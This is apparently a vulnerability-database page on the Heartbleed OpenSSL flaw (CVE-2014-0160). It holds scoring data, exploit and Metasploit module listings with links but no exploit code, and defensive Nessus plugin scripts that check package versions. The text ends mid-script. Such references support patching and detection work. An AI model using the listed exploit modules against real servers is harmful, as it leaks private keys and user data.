Vulnerabilities > CVE-2014-0160 - Out-of-bounds Read vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
NONE Availability impact
NONE Summary
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Overread Buffers An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.
Exploit-Db
description OpenSSL TLS Heartbeat Extension - Memory Disclosure. CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform file exploits/multiple/remote/32745.py id EDB-ID:32745 last seen 2016-02-03 modified 2014-04-08 platform multiple port 443 published 2014-04-08 reporter Jared Stafford source https://www.exploit-db.com/download/32745/ title OpenSSL TLS Heartbeat Extension - Memory Disclosure type remote description OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions). CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform file exploits/multiple/remote/32764.py id EDB-ID:32764 last seen 2016-02-03 modified 2014-04-09 platform multiple port 443 published 2014-04-09 reporter Fitzl Csaba source https://www.exploit-db.com/download/32764/ title OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure Multiple SSL/TLS versions type remote description Heartbleed OpenSSL - Information Leak Exploit (1). CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform id EDB-ID:32791 last seen 2016-02-03 modified 2014-04-10 published 2014-04-10 reporter prdelka source https://www.exploit-db.com/download/32791/ title Heartbleed OpenSSL - Information Leak Exploit 1 description Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support. CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform id EDB-ID:32998 last seen 2016-02-03 modified 2014-04-24 published 2014-04-24 reporter Ayman Sagy source https://www.exploit-db.com/download/32998/ title Heartbleed OpenSSL - Information Leak Exploit 2 - DTLS Support
Metasploit
description This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher. id MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY last seen 2020-06-07 modified 2020-05-12 published 2014-04-09 references reporter Rapid7 source https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/openssl_heartbeat_client_memory.rb title OpenSSL Heartbeat (Heartbleed) Client Memory Exposure description This module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable. The module supports several actions, allowing for scanning, dumping of memory contents to loot, and private key recovery. The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP. The repeat command can be used to make running the SCAN or DUMP many times more powerful. As in: repeat -t 60 run; sleep 2 To run every two seconds for one minute. id MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED last seen 2020-06-08 modified 2020-05-12 published 2014-04-21 references reporter Rapid7 source https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssl/openssl_heartbleed.rb title OpenSSL Heartbeat (Heartbleed) Information Leak
Nessus
NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2014-0416.NASL description Updated rhevm-spice-client packages that fix multiple security issues are now available for Red Hat Enterprise Virtualization Manager 3. The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Red Hat Enterprise Virtualization Manager provides access to virtual machines using SPICE. These SPICE client packages provide the SPICE client and usbclerk service for both Windows 32-bit operating systems and Windows 64-bit operating systems. The rhevm-spice-client package includes the mingw-virt-viewer Windows SPICE client. OpenSSL, a general purpose cryptography library with a TLS implementation, is bundled with mingw-virt-viewer. The mingw-virt-viewer package has been updated to correct the following issues : An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2013-0169) A NULL pointer dereference flaw was found in the way OpenSSL handled TLS/SSL protocol handshake packets. A specially crafted handshake packet could cause a TLS/SSL client using OpenSSL to crash. (CVE-2013-4353) It was discovered that the TLS/SSL protocol could leak information about plain text when optional compression was used. An attacker able to control part of the plain text sent over an encrypted TLS/SSL connection could possibly use this flaw to recover other portions of the plain text. (CVE-2012-4929) Red Hat would like to thank the OpenSSL project for reporting CVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as the original reporter. The updated mingw-virt-viewer Windows SPICE client further includes OpenSSL security fixes that have no security impact on mingw-virt-viewer itself. The security fixes included in this update address the following CVE numbers : CVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166 All Red Hat Enterprise Virtualization Manager users are advised to upgrade to these updated packages, which address these issues. last seen 2020-06-01 modified 2020-06-02 plugin id 79013 published 2014-11-08 reporter This script is Copyright (C) 2014-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/79013 title RHEL 6 : rhevm-spice-client (RHSA-2014:0416) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2014:0416. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(79013); script_version("1.9"); script_cvs_date("Date: 2019/10/24 15:35:38"); script_cve_id("CVE-2012-2686", "CVE-2012-4929", "CVE-2013-0166", "CVE-2013-0169", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160"); script_bugtraq_id(55704, 57755, 57778, 60268, 64530, 64618, 64691, 66690); script_xref(name:"RHSA", value:"2014:0416"); script_name(english:"RHEL 6 : rhevm-spice-client (RHSA-2014:0416)"); script_summary(english:"Checks the rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated rhevm-spice-client packages that fix multiple security issues are now available for Red Hat Enterprise Virtualization Manager 3. The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Red Hat Enterprise Virtualization Manager provides access to virtual machines using SPICE. These SPICE client packages provide the SPICE client and usbclerk service for both Windows 32-bit operating systems and Windows 64-bit operating systems. The rhevm-spice-client package includes the mingw-virt-viewer Windows SPICE client. OpenSSL, a general purpose cryptography library with a TLS implementation, is bundled with mingw-virt-viewer. The mingw-virt-viewer package has been updated to correct the following issues : An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2013-0169) A NULL pointer dereference flaw was found in the way OpenSSL handled TLS/SSL protocol handshake packets. A specially crafted handshake packet could cause a TLS/SSL client using OpenSSL to crash. (CVE-2013-4353) It was discovered that the TLS/SSL protocol could leak information about plain text when optional compression was used. An attacker able to control part of the plain text sent over an encrypted TLS/SSL connection could possibly use this flaw to recover other portions of the plain text. (CVE-2012-4929) Red Hat would like to thank the OpenSSL project for reporting CVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as the original reporter. The updated mingw-virt-viewer Windows SPICE client further includes OpenSSL security fixes that have no security impact on mingw-virt-viewer itself. The security fixes included in this update address the following CVE numbers : CVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166 All Red Hat Enterprise Virtualization Manager users are advised to upgrade to these updated packages, which address these issues." ); script_set_attribute( attribute:"see_also", value:"http://rhn.redhat.com/errata/RHSA-2014-0416.html" ); script_set_attribute( attribute:"see_also", value:"https://www.redhat.com/security/data/cve/CVE-2013-0169.html" ); script_set_attribute( attribute:"see_also", value:"https://www.redhat.com/security/data/cve/CVE-2012-4929.html" ); script_set_attribute( attribute:"see_also", value:"https://www.redhat.com/security/data/cve/CVE-2013-4353.html" ); script_set_attribute( attribute:"see_also", value:"https://www.redhat.com/security/data/cve/CVE-2014-0160.html" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x64-cab"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x64-msi"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x86-cab"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x86-msi"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6"); script_set_attribute(attribute:"vuln_publication_date", value:"2012/09/14"); script_set_attribute(attribute:"patch_publication_date", value:"2014/04/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/08"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = eregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! ereg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); flag = 0; if (rpm_exists(rpm:"rhevm-spice-client-x64-cab-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x64-cab-3.3-12.el6_5")) flag++; if (rpm_exists(rpm:"rhevm-spice-client-x64-msi-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x64-msi-3.3-12.el6_5")) flag++; if (rpm_exists(rpm:"rhevm-spice-client-x86-cab-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x86-cab-3.3-12.el6_5")) flag++; if (rpm_exists(rpm:"rhevm-spice-client-x86-msi-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x86-msi-3.3-12.el6_5")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "rhevm-spice-client-x64-cab-3.3 / rhevm-spice-client-x64-msi-3.3 / etc"); }NASL family OracleVM Local Security Checks NASL id ORACLEVM_OVMSA-2014-0032.NASL description The remote OracleVM system is missing necessary patches to address critical security updates : - fix CVE-2014-3567 - memory leak when handling session tickets - fix CVE-2014-3513 - memory leak in srtp support - add support for fallback SCSV to partially mitigate (CVE-2014-3566) (padding attack on SSL3) - add ECC TLS extensions to DTLS (#1119800) - fix CVE-2014-3505 - doublefree in DTLS packet processing - fix CVE-2014-3506 - avoid memory exhaustion in DTLS - fix CVE-2014-3507 - avoid memory leak in DTLS - fix CVE-2014-3508 - fix OID handling to avoid information leak - fix CVE-2014-3509 - fix race condition when parsing server hello - fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS - fix CVE-2014-3511 - disallow protocol downgrade via fragmentation - fix CVE-2014-0224 fix that broke EAP-FAST session resumption support - drop EXPORT, RC2, and DES from the default cipher list (#1057520) - print ephemeral key size negotiated in TLS handshake (#1057715) - do not include ECC ciphersuites in SSLv2 client hello (#1090952) - properly detect encryption failure in BIO (#1100819) - fail on hmac integrity check if the .hmac file is empty (#1105567) - FIPS mode: make the limitations on DSA, DH, and RSA keygen length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment variable is set - fix CVE-2010-5298 - possible use of memory after free - fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment - fix CVE-2014-0198 - possible NULL pointer dereference - fix CVE-2014-0221 - DoS from invalid DTLS handshake packet - fix CVE-2014-0224 - SSL/TLS MITM vulnerability - fix CVE-2014-3470 - client-side DoS when using anonymous ECDH - add back support for secp521r1 EC curve - fix CVE-2014-0160 - information disclosure in TLS heartbeat extension - use 2048 bit RSA key in FIPS selftests - add DH_compute_key_padded needed for FIPS CAVS testing - make 3des strength to be 128 bits instead of 168 (#1056616) - FIPS mode: do not generate DSA keys and DH parameters < 2048 bits - FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys) - FIPS mode: add DH selftest - FIPS mode: reseed DRBG properly on RAND_add - FIPS mode: add RSA encrypt/decrypt selftest - FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key - use the key length from configuration file if req -newkey rsa is invoked - fix CVE-2013-4353 - Invalid TLS handshake crash - fix CVE-2013-6450 - possible MiTM attack on DTLS1 - fix CVE-2013-6449 - crash when version in SSL structure is incorrect - add back some no-op symbols that were inadvertently dropped last seen 2020-06-01 modified 2020-06-02 plugin id 79547 published 2014-11-26 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/79547 title OracleVM 3.3 : openssl (OVMSA-2014-0032) (Heartbleed) (POODLE) code # # (C) Tenable Network Security, Inc. # # The package checks in this plugin were extracted from OracleVM # Security Advisory OVMSA-2014-0032. # include("compat.inc"); if (description) { script_id(79547); script_version("1.21"); script_cvs_date("Date: 2019/11/12"); script_cve_id("CVE-2010-5298", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2014-3505", "CVE-2014-3506", "CVE-2014-3507", "CVE-2014-3508", "CVE-2014-3509", "CVE-2014-3510", "CVE-2014-3511", "CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567"); script_bugtraq_id(64530, 64618, 64691, 66690, 66801, 67193, 67898, 67899, 67900, 67901, 69075, 69076, 69078, 69079, 69081, 69082, 69084, 70574, 70584, 70586); script_name(english:"OracleVM 3.3 : openssl (OVMSA-2014-0032) (Heartbleed) (POODLE)"); script_summary(english:"Checks the RPM output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote OracleVM host is missing a security update." ); script_set_attribute( attribute:"description", value: "The remote OracleVM system is missing necessary patches to address critical security updates : - fix CVE-2014-3567 - memory leak when handling session tickets - fix CVE-2014-3513 - memory leak in srtp support - add support for fallback SCSV to partially mitigate (CVE-2014-3566) (padding attack on SSL3) - add ECC TLS extensions to DTLS (#1119800) - fix CVE-2014-3505 - doublefree in DTLS packet processing - fix CVE-2014-3506 - avoid memory exhaustion in DTLS - fix CVE-2014-3507 - avoid memory leak in DTLS - fix CVE-2014-3508 - fix OID handling to avoid information leak - fix CVE-2014-3509 - fix race condition when parsing server hello - fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS - fix CVE-2014-3511 - disallow protocol downgrade via fragmentation - fix CVE-2014-0224 fix that broke EAP-FAST session resumption support - drop EXPORT, RC2, and DES from the default cipher list (#1057520) - print ephemeral key size negotiated in TLS handshake (#1057715) - do not include ECC ciphersuites in SSLv2 client hello (#1090952) - properly detect encryption failure in BIO (#1100819) - fail on hmac integrity check if the .hmac file is empty (#1105567) - FIPS mode: make the limitations on DSA, DH, and RSA keygen length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment variable is set - fix CVE-2010-5298 - possible use of memory after free - fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment - fix CVE-2014-0198 - possible NULL pointer dereference - fix CVE-2014-0221 - DoS from invalid DTLS handshake packet - fix CVE-2014-0224 - SSL/TLS MITM vulnerability - fix CVE-2014-3470 - client-side DoS when using anonymous ECDH - add back support for secp521r1 EC curve - fix CVE-2014-0160 - information disclosure in TLS heartbeat extension - use 2048 bit RSA key in FIPS selftests - add DH_compute_key_padded needed for FIPS CAVS testing - make 3des strength to be 128 bits instead of 168 (#1056616) - FIPS mode: do not generate DSA keys and DH parameters < 2048 bits - FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys) - FIPS mode: add DH selftest - FIPS mode: reseed DRBG properly on RAND_add - FIPS mode: add RSA encrypt/decrypt selftest - FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key - use the key length from configuration file if req -newkey rsa is invoked - fix CVE-2013-4353 - Invalid TLS handshake crash - fix CVE-2013-6450 - possible MiTM attack on DTLS1 - fix CVE-2013-6449 - crash when version in SSL structure is incorrect - add back some no-op symbols that were inadvertently dropped" ); # https://oss.oracle.com/pipermail/oraclevm-errata/2014-November/000240.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?e1e2973b" ); script_set_attribute( attribute:"solution", value:"Update the affected openssl package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssl"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/12/23"); script_set_attribute(attribute:"patch_publication_date", value:"2014/11/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/26"); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"OracleVM Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/OracleVM/release"); if (isnull(release) || "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM"); if (! preg(pattern:"^OVS" + "3\.3" + "(\.[0-9]|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3", "OracleVM " + release); if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"OVS3.3", reference:"openssl-1.0.1e-30.el6_6.2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssl"); }NASL family SuSE Local Security Checks NASL id HP_VCA_SSRT101531-SLES.NASL description The RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 77023 published 2014-08-06 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/77023 title HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(77023); script_version("1.10"); script_cvs_date("Date: 2018/07/12 19:01:16"); script_cve_id("CVE-2014-0160"); script_bugtraq_id(66690); script_xref(name:"CERT", value:"720951"); script_xref(name:"EDB-ID", value:"32745"); script_xref(name:"EDB-ID", value:"32764"); script_xref(name:"EDB-ID", value:"32791"); script_xref(name:"EDB-ID", value:"32998"); script_xref(name:"HP", value:"emr_na-c04262472"); script_xref(name:"HP", value:"HPSBMU03020"); script_xref(name:"HP", value:"SSRT101531"); script_name(english:"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)"); script_summary(english:"Checks the version of the VCA package."); script_set_attribute(attribute:"synopsis", value: "The remote host contains software that is affected by an information disclosure vulnerability."); script_set_attribute(attribute:"description", value: "The RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the 'Heartbleed Bug', exists related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content."); script_set_attribute(attribute:"solution", value:"Upgrade to VCA 7.3.2 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d9ffb6dc"); script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com"); script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140"); script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160"); script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt"); script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24"); script_set_attribute(attribute:"patch_publication_date", value:"2014/04/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/06"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:version_control_agent"); script_set_attribute(attribute:"in_the_news", value:"true"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"SuSE Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release !~ "^SLES") audit(AUDIT_OS_NOT, "SuSE Linux Enterprise Server"); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); # These are the only versions the software is supported # however you can install it on later versions. So # only check non-supported versions if paranoia is on. if ( report_paranoia < 2 && !ereg(pattern:"SLES(8|9|10|11)($|[^0-9])", string:release) ) audit(AUDIT_OS_NOT, "SuSE Linux Enterprise Server 8 / 9 / 10 / 11"); rpms = get_kb_item_or_exit("Host/SuSE/rpm-list"); if ("hpvca-" >!< rpms) audit(AUDIT_PACKAGE_NOT_INSTALLED, "HP Version Control Agent"); # Get the RPM version match = eregmatch(string:rpms, pattern:"(^|\n)hpvca-(\d+\.\d+\.\d+-\d+)"); if (isnull(match)) audit(AUDIT_VER_FAIL, "HP Version Control Agent"); version = match[2]; version = ereg_replace(string:version, replace:".", pattern:"-"); fix = "7.3.2.0"; # These specific version lines are affected if ( version =~ "^7\.2\.2\." || version =~ "^7\.3\.[0-1]\." ) { if (report_verbosity > 0) { report = '\n Installed version : ' + version + '\n Fixed version : ' + fix + '\n'; security_hole(port:0, extra:report); } else security_hole(0); } else audit(AUDIT_PACKAGE_NOT_AFFECTED, "HP Version Control Agent");NASL family Windows NASL id WEBSENSE_EMAIL_SECURITY_HEARTBLEED.NASL description The version of Websense Email Security installed on the remote Windows host contains a bundled version of an OpenSSL DLL file. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73758 published 2014-04-29 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73758 title Websense Email Security Heartbeat Information Disclosure (Heartbleed) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(73758); script_version("1.8"); script_cvs_date("Date: 2019/11/26"); script_cve_id("CVE-2014-0160"); script_bugtraq_id(66690); script_xref(name:"CERT", value:"720951"); script_xref(name:"EDB-ID", value:"32745"); script_xref(name:"EDB-ID", value:"32764"); script_xref(name:"EDB-ID", value:"32791"); script_xref(name:"EDB-ID", value:"32998"); script_name(english:"Websense Email Security Heartbeat Information Disclosure (Heartbleed)"); script_summary(english:"Checks version of OpenSSL DLL file."); script_set_attribute(attribute:"synopsis", value: "The remote host has an email security application installed that is affected by an information disclosure vulnerability."); script_set_attribute(attribute:"description", value: "The version of Websense Email Security installed on the remote Windows host contains a bundled version of an OpenSSL DLL file. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the 'Heartbleed Bug', exists related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content."); # http://www.websense.com/content/support/library/ni/shared/security-alerts/openssl-vul-2014.pdf script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?60cf5c8e"); # http://www.websense.com/support/article/kbarticle/Hotfix-OpenSSL-for-Websense-Email-Security-7-3-with-HF-6-and-later script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?35854217"); script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com"); script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140"); script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160"); script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt"); script_set_attribute(attribute:"solution", value: "Refer to the vendor advisory and apply the necessary patch."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24"); script_set_attribute(attribute:"patch_publication_date", value:"2014/04/09"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/04/29"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:websense:websense_email_security"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("websense_email_security_installed.nasl"); script_require_keys("SMB/Websense Email Security/Path"); script_require_ports(139, 